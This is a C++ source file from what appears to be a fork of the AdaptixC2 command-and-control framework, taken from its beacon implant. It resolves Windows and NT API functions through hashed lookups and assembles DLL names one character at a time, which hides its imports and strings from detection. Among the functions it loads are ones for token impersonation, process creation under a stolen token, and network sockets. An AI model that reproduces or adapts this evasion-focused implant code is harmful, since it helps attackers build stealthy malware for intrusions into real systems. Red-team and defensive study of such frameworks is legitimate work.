cvg/AdaptixC2-Mod0
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
AdaptixC2-Mod0/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/ApiLoader.cpp
connorgadbois d5ecf7754b Initial commit
2026-04-06 00:20:51 -05:00

291 lines
18 KiB
C++
Raw Blame History

#include "ApiLoader.h"
#include "ProcLoader.h"
#pragma intrinsic(memset)
#pragma function(memset)
void* __cdecl memset(void* Destination, int Value, size_t Size)
{
unsigned char* p = (unsigned char*)Destination;
unsigned char val = (unsigned char)Value;
// Word-aligned fill for larger blocks
if (Size >= sizeof(size_t)) {
size_t pattern = val;
for (size_t i = 1; i < sizeof(size_t); i++)
pattern |= (pattern << 8);
while (((size_t)p & (sizeof(size_t) - 1)) && Size) {
*p++ = val;
Size--;
}
while (Size >= sizeof(size_t)) {
*(size_t*)p = pattern;
p += sizeof(size_t);
Size -= sizeof(size_t);
}
}
while (Size--)
*p++ = val;
return Destination;
}
#pragma intrinsic(memcpy)
#pragma function(memcpy)
void* __cdecl memcpy(void* Dst, const void* Src, size_t Size)
{
unsigned char* d = (unsigned char*)Dst;
const unsigned char* s = (const unsigned char*)Src;
// Word-aligned copy for larger blocks
if (Size >= sizeof(size_t) && (((size_t)d | (size_t)s) & (sizeof(size_t) - 1)) == 0) {
while (Size >= sizeof(size_t)) {
*(size_t*)d = *(const size_t*)s;
d += sizeof(size_t);
s += sizeof(size_t);
Size -= sizeof(size_t);
}
}
while (Size--)
*d++ = *s++;
return Dst;
}
CHAR HdChrA(CHAR c) { return c; }
WCHAR HdChrW(WCHAR c) { return c; }
SYSMODULES* SysModules = NULL;
WINAPIFUNC* ApiWin = NULL;
NTAPIFUNC* ApiNt = NULL;
BOOL ApiLoad()
{
HMODULE hKernel32Module = GetModuleAddress(HASH_LIB_KERNEL32);
decltype(LocalAlloc)* allocProc = (decltype(LocalAlloc)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_LOCALALLOC);
SysModules = (SYSMODULES*) allocProc(LPTR, sizeof(SYSMODULES));
ApiWin = (WINAPIFUNC*) allocProc(LPTR, sizeof(WINAPIFUNC));
ApiNt = (NTAPIFUNC*) allocProc(LPTR, sizeof(NTAPIFUNC));
SysModules->Kernel32 = hKernel32Module;
if ( ApiWin && hKernel32Module) {
// kernel32
ApiWin->LoadLibraryA = (decltype(LoadLibraryA)*)GetSymbolAddress(hKernel32Module, HASH_FUNC_LOADLIBRARYA);
ApiWin->CopyFileA = (decltype(CopyFileA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_COPYFILEA);
ApiWin->CreateDirectoryA = (decltype(CreateDirectoryA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_CREATEDIRECTORYA);
ApiWin->CreateFileA = (decltype(CreateFileA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_CREATEFILEA);
ApiWin->CreateNamedPipeA = (decltype(CreateNamedPipeA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_CREATENAMEDPIPEA);
ApiWin->CreatePipe = (decltype(CreatePipe)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_CREATEPIPE);
ApiWin->CreateProcessA = (decltype(CreateProcessA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_CREATEPROCESSA);
ApiWin->CreateEventA = (decltype(CreateEventA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_CREATEEVENTA);
ApiWin->CreateThread = (decltype(CreateThread)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_CREATETHREAD);
ApiWin->DisconnectNamedPipe = (decltype(DisconnectNamedPipe)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_DISCONNECTNAMEDPIPE);
ApiWin->DeleteCriticalSection = (decltype(DeleteCriticalSection)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_DELETECRITICALSECTION);
ApiWin->DeleteFileA = (decltype(DeleteFileA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_DELETEFILEA);
ApiWin->EnterCriticalSection = (decltype(EnterCriticalSection)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_ENTERCRITICALSECTION);
ApiWin->TryEnterCriticalSection = (decltype(TryEnterCriticalSection)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_TRYENTERCRITICALSECTION);
ApiWin->GetExitCodeProcess = (decltype(GetExitCodeProcess)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETEXITCODEPROCESS);
ApiWin->GetExitCodeThread = (decltype(GetExitCodeThread)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETEXITCODETHREAD);
ApiWin->FindClose = (decltype(FindClose)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_FINDCLOSE);
ApiWin->FindFirstFileA = (decltype(FindFirstFileA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_FINDFIRSTFILEA);
ApiWin->FindNextFileA = (decltype(FindNextFileA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_FINDNEXTFILEA);
ApiWin->FreeLibrary = (decltype(FreeLibrary)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_FREELIBRARY);
ApiWin->GetACP = (decltype(GetACP)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETACP);
ApiWin->GetComputerNameExA = (decltype(GetComputerNameExA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETCOMPUTERNAMEEXA);
ApiWin->GetCurrentDirectoryA = (decltype(GetCurrentDirectoryA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETCURRENTDIRECTORYA);
ApiWin->GetDriveTypeA = (decltype(GetDriveTypeA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETDRIVETYPEA);
ApiWin->GetFileSize = (decltype(GetFileSize)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETFILESIZE);
ApiWin->GetFileAttributesA = (decltype(GetFileAttributesA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETFILEATTRIBUTESA);
ApiWin->GetFullPathNameA = (decltype(GetFullPathNameA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETFULLPATHNAMEA);
ApiWin->GetLastError = (decltype(GetLastError)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETLASTERROR);
ApiWin->GetLogicalDrives = (decltype(GetLogicalDrives)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETLOGICALDRIVES);
ApiWin->GetOEMCP = (decltype(GetOEMCP)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETOEMCP);
ApiWin->GetModuleBaseNameA = (decltype(GetModuleBaseNameA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_K32GETMODULEBASENAMEA);
ApiWin->GetModuleHandleA = (decltype(GetModuleHandleA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETMODULEHANDLEA);
ApiWin->GetLocalTime = (decltype(GetLocalTime)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETLOCALTIME);
ApiWin->GetSystemTimeAsFileTime = (decltype(GetSystemTimeAsFileTime)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETSYSTEMTIMEASFILETIME);
ApiWin->GetProcAddress = (decltype(GetProcAddress)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETPROCADDRESS);
ApiWin->GetTickCount = (decltype(GetTickCount)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETTICKCOUNT);
ApiWin->GetTimeZoneInformation = (decltype(GetTimeZoneInformation)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_GETTIMEZONEINFORMATION);
ApiWin->HeapAlloc = (decltype(HeapAlloc)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_HEAPALLOC);
ApiWin->HeapCreate = (decltype(HeapCreate)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_HEAPCREATE);
ApiWin->HeapDestroy = (decltype(HeapDestroy)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_HEAPDESTROY);
ApiWin->HeapReAlloc = (decltype(HeapReAlloc)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_HEAPREALLOC);
ApiWin->HeapFree = (decltype(HeapFree)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_HEAPFREE);
ApiWin->InitializeCriticalSection = (decltype(InitializeCriticalSection)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_INITIALIZECRITICALSECTION);
ApiWin->IsWow64Process = (decltype(IsWow64Process)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_ISWOW64PROCESS);
ApiWin->LocalAlloc = allocProc;
ApiWin->LocalFree = (decltype(LocalFree)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_LOCALFREE);
ApiWin->LocalReAlloc = (decltype(LocalReAlloc)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_LOCALREALLOC);
ApiWin->LeaveCriticalSection = (decltype(LeaveCriticalSection)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_LEAVECRITICALSECTION);
ApiWin->MoveFileA = (decltype(MoveFileA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_MOVEFILEA);
ApiWin->MultiByteToWideChar = (decltype(MultiByteToWideChar)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_MULTIBYTETOWIDECHAR);
ApiWin->PeekNamedPipe = (decltype(PeekNamedPipe)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_PEEKNAMEDPIPE);
ApiWin->ReadFile = (decltype(ReadFile)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_READFILE);
ApiWin->RemoveDirectoryA = (decltype(RemoveDirectoryA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_REMOVEDIRECTORYA);
ApiWin->RtlCaptureContext = (decltype(RtlCaptureContext)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_RTLCAPTURECONTEXT);
ApiWin->SetEvent = (decltype(SetEvent)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_SETEVENT);
ApiWin->ResetEvent = (decltype(ResetEvent)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_RESETEVENT);
ApiWin->SetCurrentDirectoryA = (decltype(SetCurrentDirectoryA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_SETCURRENTDIRECTORYA);
ApiWin->SetNamedPipeHandleState = (decltype(SetNamedPipeHandleState)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_SETNAMEDPIPEHANDLESTATE);
ApiWin->Sleep = (decltype(Sleep)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_SLEEP);
ApiWin->VirtualAlloc = (decltype(VirtualAlloc)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_VIRTUALALLOC);
ApiWin->VirtualFree = (decltype(VirtualFree)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_VIRTUALFREE);
ApiWin->WaitForSingleObject = (decltype(WaitForSingleObject)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_WAITFORSINGLEOBJECT);
ApiWin->WaitNamedPipeA = (decltype(WaitNamedPipeA)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_WAITNAMEDPIPEA);
ApiWin->WideCharToMultiByte = (decltype(WideCharToMultiByte)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_WIDECHARTOMULTIBYTE);
ApiWin->WriteFile = (decltype(WriteFile)*) GetSymbolAddress(hKernel32Module, HASH_FUNC_WRITEFILE);
// iphlpapi
CHAR iphlpapi_c[13];
iphlpapi_c[0] = HdChrA('I');
iphlpapi_c[1] = HdChrA('p');
iphlpapi_c[2] = HdChrA('h');
iphlpapi_c[3] = HdChrA('l');
iphlpapi_c[4] = HdChrA('p');
iphlpapi_c[5] = HdChrA('a');
iphlpapi_c[6] = HdChrA('p');
iphlpapi_c[7] = HdChrA('i');
iphlpapi_c[8] = HdChrA('.');
iphlpapi_c[9] = HdChrA('d');
iphlpapi_c[10] = HdChrA('l');
iphlpapi_c[11] = HdChrA('l');
iphlpapi_c[12] = HdChrA(0);
HMODULE hIphlpapiModule = ApiWin->LoadLibraryA(iphlpapi_c);
SysModules->Iphlpapi = hIphlpapiModule;
if (hIphlpapiModule) {
ApiWin->GetAdaptersInfo = (decltype(GetAdaptersInfo)*) GetSymbolAddress(hIphlpapiModule, HASH_FUNC_GETADAPTERSINFO);
}
// advapi32
CHAR advapi32_c[13];
advapi32_c[0] = HdChrA('A');
advapi32_c[1] = HdChrA('d');
advapi32_c[2] = HdChrA('v');
advapi32_c[3] = HdChrA('a');
advapi32_c[4] = HdChrA('p');
advapi32_c[5] = HdChrA('i');
advapi32_c[6] = HdChrA('3');
advapi32_c[7] = HdChrA('2');
advapi32_c[8] = HdChrA('.');
advapi32_c[9] = HdChrA('d');
advapi32_c[10] = HdChrA('l');
advapi32_c[11] = HdChrA('l');
advapi32_c[12] = HdChrA(0);
HMODULE hAdvapi32Module = ApiWin->LoadLibraryA(advapi32_c);
SysModules->Advapi32 = hAdvapi32Module;
if (hAdvapi32Module) {
ApiWin->GetTokenInformation = (decltype(GetTokenInformation)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_GETTOKENINFORMATION);
ApiWin->GetUserNameA = (decltype(GetUserNameA)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_GETUSERNAMEA);
ApiWin->LookupAccountSidA = (decltype(LookupAccountSidA)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_LOOKUPACCOUNTSIDA);
ApiWin->RevertToSelf = (decltype(RevertToSelf)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_REVERTTOSELF );
ApiWin->SetThreadToken = (decltype(SetThreadToken)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_SETTHREADTOKEN);
ApiWin->ImpersonateLoggedOnUser = (decltype(ImpersonateLoggedOnUser)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_IMPERSONATELOGGEDONUSER);
ApiWin->DuplicateTokenEx = (decltype(DuplicateTokenEx)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_DUPLICATETOKENEX);
ApiWin->CreateProcessAsUserA = (decltype(CreateProcessAsUserA)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_CREATEPROCESSASUSERA);
ApiWin->CreateProcessWithTokenW = (decltype(CreateProcessWithTokenW)*) GetSymbolAddress(hAdvapi32Module, HASH_FUNC_CREATEPROCESSWITHTOKENW);
}
// msvcrt
CHAR msvcrt_c[11];
msvcrt_c[0] = HdChrA('m');
msvcrt_c[1] = HdChrA('s');
msvcrt_c[2] = HdChrA('v');
msvcrt_c[3] = HdChrA('c');
msvcrt_c[4] = HdChrA('r');
msvcrt_c[5] = HdChrA('t');
msvcrt_c[6] = HdChrA('.');
msvcrt_c[7] = HdChrA('d');
msvcrt_c[8] = HdChrA('l');
msvcrt_c[9] = HdChrA('l');
msvcrt_c[10] = HdChrA(0);
HMODULE hMsvcrtModule = ApiWin->LoadLibraryA(msvcrt_c);
SysModules->Msvcrt = hMsvcrtModule;
if (hMsvcrtModule) {
#if defined(DEBUG)
ApiWin->printf = (printf_t)GetSymbolAddress(hMsvcrtModule, HASH_FUNC_PRINTF);
#endif
ApiWin->vsnprintf = (vsnprintf_t) GetSymbolAddress(hMsvcrtModule, HASH_FUNC_VSNPRINTF);
ApiWin->snprintf = (snprintf_t) GetSymbolAddress(hMsvcrtModule, HASH_FUNC__SNPRINTF);
}
// Ws2_32
CHAR ws2_32_c[11];
ws2_32_c[0] = HdChrA('W');
ws2_32_c[1] = HdChrA('s');
ws2_32_c[2] = HdChrA('2');
ws2_32_c[3] = HdChrA('_');
ws2_32_c[4] = HdChrA('3');
ws2_32_c[5] = HdChrA('2');
ws2_32_c[6] = HdChrA('.');
ws2_32_c[7] = HdChrA('d');
ws2_32_c[8] = HdChrA('l');
ws2_32_c[9] = HdChrA('l');
ws2_32_c[10] = HdChrA(0);
HMODULE hWs2_32Module = ApiWin->LoadLibraryA(ws2_32_c);
SysModules->Ws2_32 = hWs2_32Module;
if (hWs2_32Module) {
ApiWin->WSAStartup = (decltype(WSAStartup)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_WSASTARTUP);
ApiWin->WSACleanup = (decltype(WSACleanup)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_WSACLEANUP);
ApiWin->WSAGetLastError = (decltype(WSAGetLastError)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_WSAGETLASTERROR);
ApiWin->gethostbyname = (decltype(gethostbyname)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_GETHOSTBYNAME);
ApiWin->socket = (decltype(socket)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_SOCKET);
ApiWin->ioctlsocket = (decltype(ioctlsocket)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_IOCTLSOCKET);
ApiWin->connect = (decltype(connect)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_CONNECT);
ApiWin->setsockopt = (decltype(setsockopt)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_SETSOCKOPT);
ApiWin->getsockopt = (decltype(getsockopt)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_GETSOCKOPT);
ApiWin->closesocket = (decltype(closesocket)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_CLOSESOCKET);
ApiWin->select = (decltype(select)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_SELECT);
ApiWin->__WSAFDIsSet = (decltype(__WSAFDIsSet)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC___WSAFDISSET);
ApiWin->shutdown = (decltype(shutdown)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_SHUTDOWN);
ApiWin->recv = (decltype(recv)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_RECV);
ApiWin->recvfrom = (decltype(recvfrom)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_RECVFROM);
ApiWin->send = (decltype(send)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_SEND);
ApiWin->sendto = (decltype(sendto)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_SENDTO);
ApiWin->accept = (decltype(accept)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_ACCEPT);
ApiWin->listen = (decltype(listen)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_LISTEN);
ApiWin->bind = (decltype(bind)*) GetSymbolAddress(hWs2_32Module, HASH_FUNC_BIND);
}
}
else {
return FALSE;
}
if (ApiNt) {
HMODULE hNtdllModule = GetModuleAddress(HASH_LIB_NTDLL);
SysModules->Ntdll = hNtdllModule;
if ( hNtdllModule ) {
ApiNt->NtClose = (decltype(NtClose)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTCLOSE);
ApiNt->NtContinue = (decltype(NtContinue)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTCONTINUE);
ApiNt->NtFreeVirtualMemory = (decltype(NtFreeVirtualMemory)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTFREEVIRTUALMEMORY);
ApiNt->NtQueryInformationProcess = (decltype(NtQueryInformationProcess)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTQUERYINFORMATIONPROCESS);
ApiNt->NtQuerySystemInformation = (decltype(NtQuerySystemInformation)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTQUERYSYSTEMINFORMATION);
ApiNt->NtOpenProcess = (decltype(NtOpenProcess)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTOPENPROCESS);
ApiNt->NtOpenProcessToken = (decltype(NtOpenProcessToken)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTOPENPROCESSTOKEN);
ApiNt->NtOpenThreadToken = (decltype(NtOpenThreadToken)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTOPENTHREADTOKEN);
ApiNt->NtTerminateThread = (decltype(NtTerminateThread)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTTERMINATETHREAD);
ApiNt->NtTerminateProcess = (decltype(NtTerminateProcess)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_NTTERMINATEPROCESS);
ApiNt->RtlGetVersion = (decltype(RtlGetVersion)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_RTLGETVERSION);
ApiNt->RtlExitUserThread = (decltype(RtlExitUserThread)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_RTLEXITUSERTHREAD);
ApiNt->RtlExitUserProcess = (decltype(RtlExitUserProcess)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_RTLEXITUSERPROCESS);
ApiNt->RtlIpv4StringToAddressA = (decltype(RtlIpv4StringToAddressA)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_RTLIPV4STRINGTOADDRESSA);
ApiNt->RtlRandomEx = (decltype(RtlRandomEx)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_RTLRANDOMEX);
ApiNt->RtlNtStatusToDosError = (decltype(RtlNtStatusToDosError)*) GetSymbolAddress(hNtdllModule, HASH_FUNC_RTLNTSTATUSTODOSERROR);
}
else {
return FALSE;
}
}
else {
return FALSE;
}
return TRUE;
}
Reference in New Issue View Git Blame Copy Permalink